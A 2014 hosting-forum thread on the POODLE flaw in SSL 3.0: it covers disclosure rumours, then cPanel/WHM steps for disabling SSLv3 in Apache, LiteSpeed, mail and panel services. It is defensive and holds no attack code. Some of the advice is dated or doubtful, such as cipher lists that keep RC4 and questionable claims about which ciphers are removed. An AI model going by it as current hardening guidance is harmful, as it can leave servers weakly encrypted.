Early rumors of a nasty vuln in SSL 3.0

[Geek]

The Register published this about 45 mins ago....?  No other mention of it so far...not sure if I should hold my breath on this one... don't know much about The Reg...

http://www.theregister.co.uk/2014/10/14/nasty_ssl_30_vulnerability_to_drop_tomorrow/

 

[GIANT_CRAB]

Nobody should be using SSL 3.0 and should already be using TLS.

 

[rds100]

If the problem really SSLv3 related, you could disable it. Goodbye IE6.

 

[k0nsl]

Brian Krebs hinted at it two days ago.

 

[Nick_A]

Yeah we just disabled legacy support. Not worth the risk.

 

[Geek]

The vuln was just disclosed.

http://googleonlinesecurity.blogspot.co.uk/2014/10/this-poodle-bites-exploiting-ssl-30.html

 

[splitice]

Perhaps the best approach would be to throw a forbidden error if a modern client (client != IE6) attempts to use SSL 3.0. I am tempted to try and write this in lua.

Some SSL is better than no SSL, and IE6 supports at most SSL 3.0.

From what I understand the extent of the vulnerability is that plaintext can be decrypted under specific attacks where a connection interruption is crafted and the browser retries with SSL 3.0. With this in mind, the browser might be a better place for the patch.

 

[eva2000]

well OpenSSL 1.0.1j is released with the TLS_FALLBACK_SCSV support https://www.openssl.org/news/secadv_20141015.txt

Already updated Centmin Mod stack with OpenSSL 1.0.1j

then again for some of my sites IE <7 only accounts for 0.0032% of all browser sessions so can disable SSLv3 which it already has

 

[Enterprisevpssolutions]

How to resolve the ssl 3 exploit on cpanel

 

On October 14, 2014, security experts have alerted the general public to a flaw in an obsolete but still used SSL protocol (SSL3). The flaw is more than 15 years old but is still used by modern web browsers and servers. 

 

The "POODLE" (Padding Oracle On Downgraded Legacy Encryption) attack can force a connection to "fallback" to SSL 3.0, where it is then possible to steal cookies, which are small data files that enable persistent access to an online service. If stolen, a cookie could allow an attacker access to someone's Web-based email account, for example.

 

It's important to know that this flaw is most likely present in all servers and has nothing to do with the cPanel software. However, servers that currently function only because of SSL 3.0 fallback should be updated.

 

To accomplish this, please follow these steps. This does not appear to affect SSH and FTP services.

 

====

 

For Apache:

 

1) Go to WHM => Service Configuration => Apache Configuration => Include Editor => Pre Main Include

2) Select a version or All Versions

3) Add the following in the text box that appears: 

 

SSLHonorCipherOrder On

SSLProtocol -All +TLSv1 +TLSv1.1 +TLSv1.2

 

4) Press the Update button and rebuild your Apache configuration. 

 

This will disable SSLv3.0 on your server running Apache.

 

For LiteSpeed:

 

LiteSpeed has released an update to version 4.2.17. You can force a reinstall by running this: 

 

# /usr/local/lsws/admin/misc/lsup.sh -f -v 4.2.17

 

1) Go to WHM => Service Configuration => Apache Configuration => Include Editor => Pre Main Include

2) Select a version or All Versions

3) Add the following in the text box that appears: 

 

SSLHonorCipherOrder On

SSLProtocol -All +TLSv1 +TLSv1.1 +TLSv1.2

 

4) Press the Update button and rebuild your Apache configuration. 

 

This will disable SSLv3.0 on your server running LiteSpeed.

 

====

 

For cpsrvd:

 

1) Go to WHM => Service Configuration => Service Configuration => cPanel Web Services Configuration

2) Change the TLS/SSL Cipher List to:

 

ALL:-SSLv3:RC4:-SSLv2:!ADH:+HIGH:+MEDIUM:-LOW:-EXP

 

For Dovecot/Courier:

 

1) Go to WHM => Service Configuration => Mailserver Configuration

2) Change the SSL Cipher List to:

 

ALL:-SSLv3:RC4:-SSLv2:!ADH:+HIGH:+MEDIUM:-LOW:-EXP

 

For Exim:

 

1) Go to WHM => Service Configuration >> Exim Configuration Manager >> Advanced Editor

2) Change the following in tls_require_ciphers:

 

ALL:-SSLv3:RC4:-SSLv2:!ADH:+HIGH:+MEDIUM:-LOW:-EXP

 

Please note that for cpsrvd, Dovecot/Courier, and Exim above, the suggested cipher lists do NOT disable all SSLv3 support, it disables the ciphers which use CBC, so some SSLv3 support is still available.

 

It is possible to completely disable SSLv3 support on these service ports with the following cipher list:

 

ALL:!ADH:+HIGH:+MEDIUM:-LOW:-SSLv2:-SSLv3:-EXP

 

Completely disabling SSLv3 ciphers on the above service ports greatly limits browser compatibility and prevents connections from all but a few modern browsers such as Google Chrome.